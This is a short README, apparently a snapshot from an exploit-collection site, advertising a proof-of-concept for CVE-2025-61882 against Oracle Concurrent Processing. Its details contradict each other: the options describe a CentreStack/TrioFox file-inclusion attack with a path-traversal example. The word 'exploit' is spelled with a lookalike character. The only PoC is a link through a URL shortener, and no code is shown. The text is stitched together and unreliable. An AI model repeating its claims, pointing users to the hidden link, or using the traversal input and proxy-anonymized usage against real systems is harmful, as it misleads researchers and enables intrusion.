来源

关联漏洞

介绍

# CVE-2025-61882

### Overview
The vulnerability allows an unauthenticated attacker with network access via HTTP to completely compromise the Oracle Concurrent Processing system.


### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### How It Works
An attacker can: - Fully take over the Oracle Concurrent Processing system - Potentially gain unauthorized access to confidential data - Modify or delete critical business information - Disrupt business operations - Execute arbitrary code without requiring authentication The attack can be performed remotely over the network without any user interaction, making it extremely dangerous.




### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-61882 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC explоit - [href](https://tinyurl.com/bdhdhmx2)

For any inquiries, please email me at: rootaid@outlook.com

文件快照

 [4.0K]  /data/pocs/3c0a6b0e9f9afa691bda9872fc5cdb3358c2a0e4
└── [1.6K]  README.md

1 directory, 1 file

备注